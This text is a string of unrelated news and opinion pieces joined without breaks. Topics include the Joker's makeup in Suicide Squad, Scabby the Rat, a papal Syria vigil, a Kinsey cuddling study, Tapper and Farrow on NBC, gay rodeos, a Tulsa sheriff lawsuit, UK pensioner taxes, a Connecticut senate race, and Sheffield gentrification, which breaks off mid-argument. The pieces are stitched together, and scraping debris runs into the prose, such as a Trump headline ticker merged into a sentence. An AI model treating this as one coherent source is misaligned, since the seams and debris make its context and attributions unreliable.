“So I tried to find something to make him super scary, but at the same time romantic,” said Bertolazzi. “He's in love with Harley Quinn (Margot Robbie), who is also crazy. I always loved that contrast of a poet, a romantic, and a devil all at the same time . . . He's a bad, bad guy, but in the movie, he's something different. He's a virus jumping around and moving the story in Suicide Squad.”
“I also looked at the 1928 movie The Man Who Laughs, which was the inspiration for the Joker,” said Bertolazzi, describing the silent horror film adapted from Victor Hugo's novel of the same name. (In it, actor Conrad Veidt gave his character a morbidly exaggerated grin—which the Joker not only borrowed but made his signature expression.) “The movie was so beautiful. So that what was my biggest inspiration for Joker, apart from the fact he was so sick and full of hate. I was also thinking that the Joker's father might be a corpse.”
Bertolazzi gathered other inspirational materials, including everyday items—sawdust, wood, stone—photos, newspaper clippings, Internet images, and anything else that inspired him.
“I started to stick everything on a wall,” Bertolazzi said. Fittingly, he said, “My work room started to look like a crime scene. We start building this huge, criminal-case-like collage, and magically, I don't know how, everything started to be connected—like a picture of David Bowie I found. Because for me, the best Joker of all time is David Bowie.”
When it came time to put makeup brush to skin, Bertolazzi and the filmmakers made the decision to keep the Joker separate from the rest of the Suicide Squad cast by putting everyone in separate makeup trailers.
“We decided to keep him alone, because the Joker is different . . . something jumping in the middle of everybody,” Bertolazzi explained. “We thought of him as a movie inside another movie. When he arrived, nobody knew. He'd jump inside the trailer; we'd start the makeup process with just me and him; and slowly, he became the Joker.”
Of the three-hour transformation, Bertolazzi said, “We started painting in the face and doing the skin, because the Joker's skin is the most important. We did six or seven layers of makeup, because I wanted it to look really dirty and really sick—with the pale skin, the veins, and a wound. This is a guy who hasn't ever taken a shower.”
It was David Ayer's idea to give the Joker a scar. Bertolazzi expanded on that idea by giving him seven.
“This guy is completely crazy,” said Bertolazzi. “I imagine him in front of a mirror in the morning, like everyone else, but he never brushes his teeth. Instead he takes a blade and cuts his face, just for fun.”
Bertolazzi played around with the Joker's makeup through production, changing something in every single shot—“I gave him more details or less, depending on the moment.”
Each day Leto was on set, Bertolazzi was the only one who witnessed the actor's daily transformation. “It started in silence,” Bertolazzi said. “During this process, Jared slowly, slowly started to act like the Joker. And then, all of a sudden, it was like, ‘Oh my god!' He became the Joker for real.”
Despite the intimidating challenge he faced, Bertolazzi was satisfied with how the studio trusted him to experiment and take the movie's most prized character into his literal hands.
“What was incredible was that Warner Bros. and D.C. Comics are obsessed with everything,” Bertolazzi said, “but they never asked me to change anything in my makeup. Not one single detail. They let me do everything I wanted.”
Get Vanity Fair's HWD Newsletter Sign up for essential industry and award news from Hollywood. E-mail Address Subscribe
The recent announcement, already apparently abandoned, that some within organized labor want to abandon “Scabby the Rat” drew immediate protest.
Sean McGarvey, president of the AFL-CIO's Building and Construction Trades Department, said in a now-deleted tweet, “Meeting with our Presidents and state councils. Issued a call to retire the inflatable rat. It does not reflect our new value proposition.”
As Mike Elk reported at In These Times, the response from union members and lovers of the widely recognized inflatable rat, used to draw attention to workers' actions, was immediate. One of the loudest was Scabby the Rat himself, via a Twitter account used most of the time to disseminate labor news by a self-described independent hacktivist, consultant, and writer based in Chicago. “'Value proposition?' Here's the proposition: treat workers fairly. Here's the value: you get to do business,” he tweeted in response, the start of a stream of tweets quoting famed labor leaders and denouncing “MBA weasel-speak."
Love for the rat seems to have trumped value propositions for the time being—since the story broke that leadership was reconsidering his usefulness, he's popped up in New York, Washington, DC, and even outside the home of Philadelphia Mayor Michael Nutter. His end seems to be a long way off, but where did the rat get his start?
Scabby was born in 1990 in Illinois, from the minds of organizers Ken Lambert and Don Newton from District Council 1 of the International Union of Bricklayers and Allied Craftworkers. According to council director James Allen, the organizers got together and suggested a “bigger than life” symbol for picket lines that would get people's attention and immediately send a signal to the businesses being picketed.
Peggy O'Connor, co-owner with her husband Mike, of Big Sky Balloons and Searchlights, Inc. in Plainfield, Illinois, remembered when the call came in for the rat. “Mike and the organizers were going back and forth, saying, 'We need it more snarly.' They wanted a mean, ghastly looking kind of rat.” With some claws and the now-famous “scabby” pink belly, the rat was complete, and the basic shape hasn't changed since then.
Scabby struck a chord with workers—Allen noted that the rat was already a symbol for bosses who didn't use union labor or do right by their workers. “I think [Scabby] was, in fact, created through the collective consciousness brought about by decades of struggle,” commented Miles Kampf-Lassin, community editor at In These Times.
From the first appearance, it took less than a year for other locals to want their own Scabbys. “The novelty spread like rats,” O'Connor joked. Big Sky sells about 100 rats a year, ranging from six feet to 30 feet tall, though their best sellers are 10, 12, and 15-footers. “We've sold the most to the East Coast, we've sold them also to California, sold them to New Mexico, sold them to places in Canada,” O'Connor said. “We'll drive around to a snow-removal company and they've got a rat that we sold to somebody in New Jersey, and it's like, 'Wow, the rat came back.' The different unions borrow them from one another, people will call us and say, 'One of your rats is at the snow removal place.' They just pop up.”
They come in multiple colors—a bright yellow Scabby joined Chicago's teachers on their strike this year—and customizations like longer or shorter claws, different facial expressions (some, O'Connor noted, want their Scabby less snarly) are available. Big Sky also sells “fat cats,” complete with diamond pinky ring and a construction worker held by the throat, in six sizes, and “greedy pigs” in four. There's even a “union bug” for the ultimate gross-out factor.
But Scabby remains the most popular, the most recognizable. In an email interview (he—or she--prefers to remain anonymous), the person behind the “Scabby the Rat” Twitter handle commented, “The symbol of Scabby appearing at a strike is a clear signal to the public that the management is attacking its workforce and the public by using unfair and unsafe practices. Such signals are not often clearly received by the public, in part because labor relations is not a simple topic. A 12-foot inflatable rat helps to make the message much clearer.”
The National Labor Relations Board has, in recent years, upheld the use of the rat as symbolic speech. (Century Foundation fellow Moshe Marvit tweeted that by his count the rat is discussed in 41 NLRB decisions and 20 federal court decisions.) Essentially, the rat is a statement about a place of business—a clear statement that the union (or workers who may not be part of a union) doesn't like its labor practices. This is protected speech as well as a nod to the fact that the rat, in its twenty-odd years of existence, has become a well-recognized icon.
Republican NLRB member Brian Hayes dissented from that ruling, calling the use of the rat "unmistakably confrontational,” but that's the point. An inflatable rat, even a 30-foot-tall one that has “threatening” or “frightening” features, doesn't hold the power that employers do, so the union has to resort to tactics that attract attention, that inform the public that workers are being treated unfairly and to attempt to win them over.
“Scabby is a symbol of confrontation. The suggestion that capital will treat workers better if unions just become less confrontational couldn't be more wrong,” Scabby the Rat said. “The weekend, the eight-hour day, and worker safety were all won over the kicking and screaming (and bullets and truncheons) of the ownership class, not because labor leaders and capitalists attended the same seminars on management. Union leadership, and confrontation-shy liberals more generally, would do well to take a history lesson here and take a step to the left, because that's the only place worker protection calls home.”
Even the right wing occasionally sees the value of Scabby; as Mike Elk reported, in 2011, the front group Americans for Job Security brought a rat (not the model rat trademarked by Big Sky Balloons, it's worth noting) to the NLRB to protest what they called its “job-killing” agenda. Americans for Job Security is of course interested in anything but Job Security—it was founded by Republican operatives and shares a message and a “media buyer” with American Crossroads, Karl Rove's outfit for electing probusiness Republicans. But the attempt to co-op the rat showed the value of this particular kind of symbolic speech.
Most of the time, of course, business is no fan of the rat. “There's no doubt that they don't like the attention,” Allen said. “On the other hand, the cars, they always honk their horns, the pedestrians, they tend to like the rat. Chicago, like New York, is a union town, most people know what the rat represents.”
Occasionally, the rats even come off the worst in a confrontation. On three different occasions that Allen remembers, the rats have been stabbed by angry representatives of management. “About two years ago, this guy came out with a big butcher knife and slashed the rat. We had him arrested, he actually reimbursed us for about $8,000, which is what the rat cost,” Allen said. John Cronan, a New York-based organizer, related his tale of seeing Scabby stabbed while working with the IWW to organizer workers at Flaum Appetizing. “It deflated, and we had to send it away to get fixed. Was the first time I ever saw something like that,” he said. In New York, organizers from New York Communities for Change also witnessed an irate manager stab the rat outside a car wash where workers were organizing.
The violence Scabby occasionally experiences may seem funny, but it's also representative of the way workers are treated by management all too often. The boss might not come at them with a butcher knife, but workers and their unions are under attack and union density is at its lowest since 1929; even with a recent wave of strikes at Walmart, fast food restaurants, teachers in Chicago, and bus drivers in New York, visible signs of labor's presence are all too few these days.
Labor historian Erik Loomis commented, “In a world where unionized workers are struggling to keep their unions, their contracts, and their jobs, the rat gives them a humorous way to express their frustration with the trajectory of their lives. It has become part of labor's internal culture, a lifestyle under siege. Getting rid of the rat because it doesn't fit union leaders' 'value proposition' and might offend CEOs, shows that too many union bureaucrats don't value the culture of the workers they theoretically represent.”
That culture is appreciated beyond the union hall and shop floor. Molly Crabapple, VICE columnist, artist, and illustrator for this piece, said, “Scabby the Rat is popular art at its best. He's the mean, funny, fiercely alive counterpart to all New York's anodyne corporate sculpture.”
Blogger Stefanbc, writing in defense of the rat, called for workers to get more confrontational, not less. He recommended watching the Oscar-nominated documentary How To Survive a Plague, looking at the way ACT UP shook the complacent government that was willing to let people with AIDS, mostly gay men, die. “This is not the time for meekly accepting one's fate or deciding to approach those who wish to destroy any semblance of organized political power for the degraded American worker with an undeserved air of civility,” he argued. “Instead,” he wrote, “it's time to give Scabby a promotion.”
For the activist behind “Scabby the Rat” on Twitter, the destruction of the middle class goes hand in hand with the destruction of unions. The neoliberal economic project, he pointed out, is dedicated to erasing the gains that workers made in the 20th century. “Unions are basic economic self-defense for ordinary people, a collective action to form the only counterweight we have against the entrenched interests of an increasingly abusive, overwhelmingly powerful plutocratic minority,” he said.
“I guess what Sean McGarvey's probably trying to do is go about organizing a little differently,” Allen said. “There are times when we go about organizing peacefully and get things resolved that way, but the rat is kind of the last weapon we use.”
In 2011, as Wisconsinites gathered outside the Capitol to fight right-wing governor Scott Walker's bill taking away collective bargaining rights from public workers, Roosevelt Institute fellow Matt Stoller argued, “People might only like unions when they see strikes, otherwise all they hear about is backroom negotiations. Perhaps effectively striking is actually the way to force people to ask questions about what kind of country they want to live in.”
Scabby the Rat doesn't just come out at strike time, but he sends a similar signal that unions are standing up for their rights. He's around for informational pickets and rallies, to send a message to politicians and business leaders that labor is watching. Scott Walker was greeted by three Scabbys of different sizes when he showed up in New York for a fundraiser after his attack on his state's workers, and James Allen recalls a rally in Chicago that featured 27 rats all together. Scabby is a symbol of solidarity, and the most visible symbol of a labor movement that isn't dead yet, that is willing to fight, not just make backroom deals.
@sarahljaffe
@mollycrabapple
On Saturday Pope Francis will lead thousands in St Peter's Square in a prayer vigil for peace.
During his Angelus address on Sunday, Pope Francis said: “We will gather in prayer and in a spirit of penance, invoking God's great gift of peace upon the beloved nation of Syria and upon each situation of conflict and violence around the world. Humanity needs to see these gestures of peace and to hear words of hope and peace.”
The vigil will include a recital of the rosary, eucharistic adoration, Scripture readings, a papal blessing and remarks by Pope Francis, said the Vatican spokesman, Jesuit Father Federico Lombardi. During the event, which will last from 7 p.m.-11 p.m, priests will be available to hear confessions.
For all Catholics, the Pope has proclaimed Saturday a “day of fasting and prayer for peace in Syria, the Middle East and throughout the world.” On fast days, adult Catholics in good health are expected to eat only one full meal.
The Pope said he was inviting everyone, “including our non-Catholic Christian brothers, followers of other religions and all men of good will, to participate, in whatever way they can, in this initiative.”
According to Fides, the news agency of the Congregation for the Evangelisation of Peoples, Syria's Grand Mufti Ahmad Badreddin Hassoun, leader of the country's Sunni Muslims, has approached the papal nuncio in Damascus, Syria, with a request to attend the Rome vigil.
Even if that trip proves impossible to arrange, Fides reported, the mufti has called on his followers to pray for peace, “in communion and simultaneously with the Pope.”
Obama has called for military strikes to punish the government of Syrian President Bashar Assad, which the U.S. blames for a chemical weapons attack near Damascus that reportedly killed more than 1,400 people, including children on August 21.
Over the last two-and-a-half years, according to the United Nations, a civil war between Assad's government and rebel forces has killed more than 100,000 people, driven 2 million refugees out of Syria and displaced another 4.5 million inside the country.
Pope Francis said he condemned the use of chemical weapons “with utmost firmness,” adding that “those terrible images from recent days are burned into my mind and heart.”
“A judgment of God and also a judgment of history upon our actions are inescapable,” he said.
But the Pope insisted that “never has the use of violence brought peace in its wake. War begets war, violence begets violence.”
Instead, Pope Francis called on all parties to “follow the path of encounter and negotiation and so overcome blind conflict.”
Bishop Mario Toso, secretary of the Pontifical Council for Justice and Peace, told Vatican Radio Sept. 2 that a “solution to Syria's problems cannot be that of armed intervention. The situation of violence would not be diminished. On the contrary, there is the risk that it will explode and extend to other countries.”
The Secretariat of State has invited foreign ambassadors accredited to the Holy See to attend a Vatican briefing on Syria on Thursday.
Dougal Waters / Iconica via Getty Images
That old chestnut about women always wanting to cuddle? Myth, according to a Kinsey Institute study, which finds that kissing and hugging were more important to the happiness of men than of women.
The study involved 1,009 heterosexual middle-aged and older couples in long-term (average 25 years) committed relationships in five countries. Researchers asked participants to fill out questionnaires about their satisfaction with their relationships and sex lives, revealing some surprising truths: for instance, men who reported frequent kissing or cuddling with their partners were on average three times as happy with their relationships as men who reported limited snuggling. For women, such shows of tenderness didn't have much impact on relationship satisfaction.
LIST: 5 Little-Known Truths About American Sex Lives
However, both men and women who reported frequent touching, kissing and hugging, as well as higher sexual functioning and more sex, were more likely to be sexually satisfied. For women, sex got better over time: they reported significantly more sexual satisfaction after being with their partner for 15 years.
“Possibly, women become more satisfied over time because their expectations change, or life changes with the children grown,” Julia Heiman, director of the Kinsey Institute for Research in Sex, Gender and Reproduction and lead author of the study, said in a statement. “On the other hand, those who weren't so happy sexually might not be married so long.”
Both men and women became happier with their relationships the longer they stayed together. But, in a reversal of stereotype, men were more likely than women to report being happy in their relationships, while women were more likely to report being satisfied with sex.
The couples in the survey hailed from Japan, Brazil, the U.S., Germany and Spain. The study found that Japanese couples were significantly happier with their relationships than American couples, who were in turn happier than couples from Brazil and Spain. The Japanese were also more likely to report sexual satisfaction than Americans: Japanese men in particular were 2.61 times more sexually satisfied than American men. As for women, Japanese and Brazilian women were more likely to report sexual satisfaction than their American counterparts.
PHOTOS: Animals in Love
What predicted overall satisfaction? For women, key factors were relationship duration and their own good sexual functioning. But for men, there seemed to be a larger variety of contributors to happiness: longer relationships, good physical health (healthy men were 67% more likely to report being happy with their relationships than men in poor health), good sexual functioning and their wives' sexual satisfaction: a man's happiness rose 17% with each additional point he rated the importance of his partner's orgasm.
“This study on heterosexual couples provides a basis for future research on sex and gender, such as how same-sex couples may or may not show similarities and differences in relationship and sexual satisfaction,” said Heiman.
The study [PDF] was published in the Archives of Sexual Behavior.
Meredith Melnick is a reporter at TIME. Find her on Twitter at @MeredithCM. You can also continue the discussion on TIME's Facebook page and on Twitter at @TIME.
CNN's Jake Tapper said NBC's excuse for passing on Ronan Farrow's bombshell story detailing allegations of sexual harassment and assault against Harvey Weinstein "seems like a real lie to me."
Tapper made the comments during an interview with Farrow on Wednesday.
Farrow maintains that he had an NYPD audio recording of Weinstein confessing to groping one woman and had also secured several interviews with three women who said Weinstein made unwanted advances.
ADVERTISEMENT
Farrow, who once hosted an afternoon program on MSNBC, took the story first to NBC News, but the network decided against running the story.
"An NBC source told ‘The Daily Beast,' quote, 'He brought NBC News early reporting on Weinstein that didn't meet the standard to go forward with the story. It was nowhere close to what ultimately ran. At that time, he didn't have one accuser willing to go on the record or identify themselves. The story he published is radically different than what he brought to NBC News,' " Tapper read on the air to Farrow.
"That seems like a real lie to me," the anchor continued. "My understanding is while the story was at NBC, you had three named women, the full NYPD audio and every one of the quoted executives and employees that you referenced earlier in your story, you had them all. What's the truth here?”
“Look, Jake, you understand this, these are human rights abuses, as you said," Farrow replied. "These are women coming forward with a very, very hard set of stories and I really want the focus to be on them and what they did and continuing their fight."
"The media piece of this is a conversation that can unfold over time," Farrow continued. "I've already spoken as of last night on 'The Rachel Maddow Show.' I was confronted with a question I didn't expect and answered it honestly."
"As I understand it now, NBC is no longer claiming that I brought this story to them," he added. "It was assigned at NBC, they've talked about how long it was there and the fact that there was a lot while it was there. I truly do think it's very important for us to stay focused on the women here.”
NBC News was criticized one year ago for allowing The Washington Post to scoop the infamous “Access Hollywood” tape that contained audio of Donald Trump Donald John TrumpHouse committee believes it has evidence Trump requested putting ally in charge of Cohen probe: report Vietnamese airline takes steps to open flights to US on sidelines of Trump-Kim summit Manafort's attorneys say he should get less than 10 years in prison MORE in 2004 bragging about groping women without consent in graphic detail.
It was never determined how the Post got the explosive tape from the show, which is produced by NBC.
Farrow eventually took the story to The New Yorker magazine, which published the explosive story earlier this week.
July 4, 2017, 7:24 PM GMT / Updated July 4, 2017, 7:24 PM GMT By Kristi Eaton
When Wade Earp's partner passed away from HIV in 1997, it was his friends from the gay rodeo circuit that offered the most solace during that dark time in his life. His fellow competitors provided much-needed emotional support, while charities affiliated with the rodeo helped pay for his partner's bills and assisted the couple in preparing for his partner's eventual passing.
“Over the years it literally has become some of the toughest times of my life, and some of these people have been there, and we've been there for each other,” Earp told NBC Out, becoming visibly emotional. “I finally found a place where I felt like I belonged.”
Wade Earp participating in a rodeo event Courtesy of Texas Gay Rodeo Association
Earp, 51, is a longtime member of the Texas Gay Rodeo Association, an affiliate of the International Gay Rodeo Association (IGRA), which supports LGBTQ-friendly rodeos around the world. There are currently 20 gay rodeos under the umbrella of the IGRA, according to the association's spokesman, Ryan Reed.
Phil Ragsdale of Reno, Nev., came up with the idea of creating a gay rodeo event in the mid-1970s as a way to help raise money for the local LGBTQ senior citizens' Thanksgiving Day dinner. He hoped the event would raise money for a good cause while at the same time helping to erase some of the stereotypes and misconceptions people had about the LGBTQ community.
The first gay rodeo event was held near Reno in 1976, and by 1985, the International Gay Rodeo Association was founded. The first full IGRA rodeo season occurred a year later with rodeos in Texas, Arizona, California, Colorado and Oklahoma, Reed said.
“Charity has always been at the core of IGRA-sanctioned rodeos,” he added. “As noted in the history, even the first gay rodeo was a charity fundraiser. By the time the 1980s rolled around, the LGBT community was facing the AIDS epidemic, and gay rodeos turned their focus to fundraising specifically to help out AIDS-related service organizations.”
In recent years, Reed said IGRA rodeo organizers have chosen charity partners both within and outside of the LGBTQ community.
Wade Earp Courtesy of Texas Gay Rodeo Association
Earp, who's based in Dallas, has been involved in the rodeo circuit for nearly 25 years. After participating in a dance competition at a local saloon hosted by the Texas Gay Rodeo Association, Earp eventually transitioned to rodeo events. He started with one event and eventually competed in all 13 — even becoming the world bareback bronc riding champion.
“[Rodeo] seemed like more of a family-type atmosphere, where once you were included in the group, they would do things together — go out dancing or go to different fundraisers [and] go out and eat,” he said. “Once I got involved, it was just very welcoming, and I finally found a place where I could belong.”
Through the rodeo community, Earp said he has been able to dispel many of the misconceptions he had about coming out and being openly gay. At one point, he thought living his truth would prevent him from being accepted at his church and lead his family to disown him. All of that proved to be untrue, he said, noting that his mother even preached at the funeral of his partner.
“When you first feel you're different, you kind of feel like you're the only person like that, so when you start finding like-minded individuals, you start thinking ‘I'm not the only one,'” he said.
Wade Earp participating in a rodeo event Courtesy of Texas Gay Rodeo Association
Over the years, the rodeo has allowed Earp to meet people from all over the world. He even participates in rodeo schools, where he teaches people with little to no experience how to compete in some of the events.
“There are a lot of people who see what we do and say, ‘I want to try that,'” he said. “A lot of people think they have to own the horses or be living on a farm or ranch or something like that, but I've also gotten to teach some inner-city people.”
Earp said it's especially satisfying seeing people who initially just want to casually learn about rodeos become more and more involved with the activity.
Mary Arbuckle, now the executive director of the Oklahoma City-based Great Plains Rodeo Association, is one such person. After coming out in 1982, Arbuckle became involved with Other Options, an HIV/AIDS organization founded by her mother that serves as a charity partner of the rodeo association Arbuckle now runs. After a few years of being involved with the rodeo as a charity partner, Arbuckle eventually decided she wanted to participate as a competitor.
Arbuckle, now 53, first started chute dogging (steer wrestling), then she moved to steer riding and now she's a three-time world champion in the wild drag competition, an event including — you guessed it — drag queens. More than half of gay competitors get their start in such campy events that are unique to LGBTQ rodeos, according to the IGRA.
“I love the challenge, but the rodeo group, we really just like to see everyone do well,” Arbuckle said. “Even though we're competing, we're really not.”
About 100 people participate every May in the Great Plains Rodeo Association competition, according to Arbuckle, who said the event has become a community staple. “We're always looking for people that want to come in and join us. If not competing, we have people who do the judging and the timing,” she noted, adding that it's an all-volunteer event.
While many of the first gay rodeos were founded to help out LGBTQ organizations, the fundraising efforts have since expanded to include organizations that work with children, women and people with disabilities, according to Earp. He and other LGBTQ participants are also adamant that IGRA-affiliated rodeos are dedicated to openness and inclusivity.
"We're not just for the LGBT community," Earp said. [Straight allies also] feel that sense of family and choose to stay within our rodeo, so they feel like they are a part of something."
Follow NBC Out on Twitter, Facebook and Instagram
The Theory of Mind
This is the assumption that others have a mind since man can only assess the existence of their mind by introspection since no one has access to another's mind. It is base on reciprocal social interaction observed in others and the understanding the emotions and actions of the other. Through this theory, one can attribute mental states of the other person and understand them.
It is an innate potential in primates like humans that need social experience over many years to develop fully. Different people develop different levels of theory of the mind hence the varying levels of empathy.
In simple terms, it means putting yourself in another person's shoes, seeing the world from their perspective and acknowledging that they have a different viewpoint from your own.
Kenneth Starr, the special prosecutor who carried out the investigation of President Bill Clinton, wrote a scathing opinion piece in The Washington Post. He took aim at President Trump for his recent treatment of Attorney Jeff Sessions who he has publicly derided as “weak” and “beleaguered” on Twitter. Starr told the President to “please cut it out” and said that his attacks are “profoundly misguided” and one of the most outrageous “courses of presidential conduct I have witnessed in five decades in and around the nation's capital.”
As if that blow from Starr wasn't enough, he used an example of how President Ronald Reagan handled a situation where his Attorney General gave him a piece of advice that he didn't like. Apparently Attorney General William French brought bad news to the president that the legislative veto was unconstitutional. Reagan's response? He listened, and he accepted the attorney general's advice.
“What the attorney general said, the president accepted. It was a matter of trust,” Starr wrote.
Over the last few days, Trump has been launching a full out assault on Sessions in an apparent attempt to get him to resign. Just this morning, he went after Sessions for not replacing Acting FBI Director Andrew McCabe. Internally, there are reports that even his Republican colleagues in congress are growing wary of his attacks on the former Alabama senator.
Starr drew fire himself from Democrats who, at the time, said his investigation into the Clinton administration was far reaching, and was turning into a “witch hunt.” Starr most recently served as president of Baylor University in Waco, Texas.
[image via CNN screengrab]
A federal lawsuit against Tulsa County Sheriff Stanley Glanz and several other defendants was expanded today to include two cases of alleged excessive and unnecessary force by former reserve deputy Robert Bates, including the shooting death of Eric Harris.
The law firm of Smolen, Smolen and Roytman, PLLC added the Harris case along with a case involving a man named Terry Bynum to the lawsuit filed on behalf of Scott Birdwell in May.
Byrum claims Bates used a Taser on him in February, when he was on the ground in the custody of another deputy and not resisting.
That was roughly two months before Bates, who said he was trying to use his Taser on Harris, shot and killed him.
The third case, that of Birdwell, alleges that he was denied proper medical treatment after he was attacked by an inmate at the Tulsa County Jail.
Birdwell, who was a trustee at the time, says he repeatedly requested medical care but that he was simply stitched up by a person not qualified to treat him.
All three cases, attorney Dan Smolen tells KRMG, are tied together because they point to consistent and deliberate violations of the Sheriff's Office's own policies and procedures.
"The systemic of the constutional violations are woven throughout all three of those causes of action," Smolen said.
For example, the Byrum case proves that Robert Bates was an active participant in TCSO operations, and not simply helping secure and record scenes as the Sheriff has stated.
"The Byrum Tasing incident shows that Bob Bates not only had a direct involvement in other task force operations, but that he was actively seeking to use force during those operations," Smolen told KRMG.
The lawsuit also names the Board of County Commissioners of Tulsa, Armor Correctional Health Services, Bates, Deputies Michael Huckeby, Joseph Byars and Ricardo Vaca, and an unknown nurse and physician working at the jail.
Huckeby, Byars and Vaca all participated in the operation where Harris was killed.
Paddy Millard, one of the founders of charity Tax Help for the Elderly, said there are a number of reasons the older generation might struggle.
“As you get older you get less confident and competent, particularly with tax,” he said. “Many older women outlive their husbands and are less likely to have ever handled tax.
“I've only had one man come to us for advice and say my wife handled all the paperwork: mostly it's women saying ‘my husband did it all'.”
Mr Millard said HMRC could do more to make the process simpler for those who have “predictable untaxed income”. For example, a foreign pension cannot be taxed at source as it originates in another country and a pensioner receiving one is expected to fill in a return. However, their income remains predictable and Mr Millard said this should be made easier.
The spokesman for the tax office said: “The vast majority of pensioners do not need to fill in tax returns, and we are taking thousands of them out of self assessment every year. “We offer a wide range of support for those who need to complete a tax return through our website, helplines and home visits.”
Confusion among pensioners about ‘simple assessment'
In addition to pensioners with extra income, around 27,000 of those receiving the state pension only are currently required to fill in a tax return – despite HMRC already holding their data.
Caroline Miskin, a tax expert at the ICAEW, said those with a state pension above the tax-free personal allowance, currently £11,500, were currently required to fill in a return as the Department for Work and Pensions has no way to tax their income at source.
HMRC has plans to lift these pensioners out of the self-assessment system, but the chaotic introduction of the new “simple assessment” process has left many scratching their heads. HMRC began publicising its simpler system in March, telling thousands of pensioners they would no longer fill in a return. But the tax office still sent them letters requesting a return in April.
A spokesman for HMRC said it could be “four or five months” before it announces the introduction of simple assessment and anyone who has received a letter requesting a tax return should fill one in as normal.
Simple assessment should mean in cases where information is already held by HMRC, it will send taxpayers an estimate of their income. The taxpayer will only have to contact the taxman if there is a mistake.
Have you encountered confusion filling in your tax return this year? Let us know by emailing sam.meadows@telegraph.co.uk
This is NOT a swing state
Hillary Clinton won CT by a 55-40 margin. Obama beat Romney by 58-41 in the Constitution State. A dismaying trend in the reliably Democratic Connecticut. But nothing that would suggest a state whose upper legislative body is evenly divided between Democrats and Republicans. But that is indeed the unfortunate reality thanks partly to the national party's total abdication of responsibility in relation to state and local races.
The Connecticut State is currently split 17-17 pending the results of two special elections this coming Tuesday. The good news is that Senate District 2, which includes parts of Hartford, is reliably Democratic. The bad news is that Senate District 32, which encompasses suburban and rural portions of Litchfield County, is a Republican stronghold. The likely outcome is therefore an 18-18 split, with the tie-breaking vote cast by Democratic Lieutenant Governor Nancy Wyman.
The 18-18 split would be an effective majority. But it's obviously not ideal. And Democratic grasp on the upper body is made more tenuous by the fact that unpopular Democratic governor Dannel Malloy faces the voters in 2018. Democrats hope to have other opportunities to forge a stronger majority in the 2018 statewide elections, of course, but they'd rather play offense than defense.
We could shake things up by winning CT-32 and gaining an outright 19-17 majority. Our candidate, Greg Cava, has experience running in this district. He's come out on the short end in the past, but he has a well-defined platform, which includes socially progressive positions on women's and LGBTQIA issues. Mr. Cava also speaks strongly in favor of sensible gun control measures.
The campaign is looking for phone banking volunteers and for help with canvassing and poll standing through the election. This link will take you to a Google Form that allows you to indicate your availability for any of those tasks. You can also email the campaign directly at cavaforsenate — at — gmail — dot — com.
We've seen what turnout and volunteerism can do to turnout and margin in Delaware. Let's keep the trend going this week in CT!
Gentrification seems to be happening in every big city right now. Large swathes of previously undesirable inner-city areas in old industrial cities have seen their residential demographics shift in the past 10-15 years; from poor people living in sub-standard (but cheap) accommodation – in old, predominately ex-industrial, crumbling, mostly-disused buildings – to young, wealthy, educated, liberal types who flood the areas with coffee shops, renovate the old buildings, and push up house prices. London has experienced this to a much greater extent than any other city in the UK, but it is definitely happening elsewhere, e.g. in Manchester and Birmingham.
There is a lot of anger surrounding these new residents. There are claims that they are “rich kids co-opting the lives of the poor”, trying out living in these areas like it's some sort of novel educational experience in nostalgia slumming, but never really having to worry about poverty or destitution. There is also a claim that they are the gentriying foot soldiers of capitalism: they “make the first move into post-industrial, post-welfare state wastelands like brownfield sites and council housing estates and sow the seeds of cultural capital”, enabling developers to move in and build a bunch of expensive flats several years later.
You can see how a poor, working-class person might see a guy with a beard and skinny jeans moving into their neighbourhood as something akin to a portent of doom; the trendy looking guy on a bike buying coffee from the new cool coffee shop that just opened up down the road is the sign that you can expect your rent to rise through the roof any time soon, after which you'll have to leave your flat and move elsewhere, giving up the life you built in this neighbourhood. This sort of fear has led to outright violence against the “offending” gentrifiers in parts of London.
But what if young, educated, middle-class people moving into a previously poor area didn't always have to mean that gentrification was occurring? What if some of this anger is being misdirected?
Kelham Island: a case study of “gentrification”
Kelham Island – an old industrial area at the extreme north end of Sheffield city centre – appears to be undergoing all the outward signs of gentrification. It has trendy new bars, renovated industrial buildings, a shipping container start-up hub, a trendy eco-village, a “desireablility” currently being salivated over by estate agents, and a distinct rise in bearded guys riding bikes (including myself). It's had a meteoric rise from derelict industrial wasteland in the late 90s to one of the trendiest hipster hotspots in the entire country. It was recently named joint number 8 in Travel Supermarket's “Hip Hang-out Neighbourhood Index” alongside Dalston, the (in)famous super-cool and super-gentrified area of inner London.
Many people (myself included) were slightly taken aback by all this recent praise for an area that was a daunting industrial wasteland only 10 years ago with an active red-light district, immortalised in the Arctic Monkeys song “When The Sun Goes Down”. The scale of industrial dereliction in the area 20-30 years ago is hard to put into words. Even for a guy who grew up in similarly hard-hit Manchester, I was shocked by what I saw in Kelham Island when I first moved to Sheffield in 2003. Outside of the Kelham Island Museum and the nationally famous real ale pubs The Fat Cat and Kelham Island Tavern, it was largely crumbling and derelict. Here are some lovely pictures of the area in the 80s and 90s showing the sheer scale of the dereliction. Despite the incredible pace of development in the past few years, there are large parts of the area that are still derelict to this day.
However, in the past 10 years, there have been a large number of new developments in the area, including the aforementioned Little Kelham, the renovation of Cornish Place, the Dunfields student development, Kelham Riverside, and the commercial/office conversion of the Chimney House, amongst many others. This has led to rapid increase in the residential population of the area. More importantly, it's led to an increase of the young, wealthy, liberal, educated population of the area, which has flared up tensions surrounding gentrification and hipsters. Graffiti has appeared stating “no more poshies” and “fuck yuppies”. Cars along the main street (Green Lane) have their windows smashed way more than you would expect, and I've seen at least one car with “no more poshies” graffitied on the side. An anarchist squat appeared close to Yellow Arch Studios several months ago with “FUCK THE SYSTEM, STOP GENTRIFICATION” scrawled in the window. With all this anger, you'd think that the incoming wealthy hipsters had forced out a large number of poor people in line with predictable gentrification patterns, right?
Why Kelham Island doesn't fit the pattern
Well, pretty much no one lived in Sheffield city centre (including Kelham Island) until about 15 years ago. According to the Centre for Cities, Sheffield's city centre has more than doubled its population in the past 10 years. According to the Shalesmoor, Kelham Island, and Neepsend Network, the population of Kelham Island (and the nearby Shalesmoor and Neepsend) has increased tenfold in the last decade. A cursory look at the architecture of the area confirms this. The only nearby residential units that existed prior to the current building spree are this council block on Shalesmoor (which has most likely been there since the 40s), and suburban houses here, a good 15 minutes walk up Rutland Road away from the centre of Kelham Island, which have likely existed since the 50s given their architectural style.
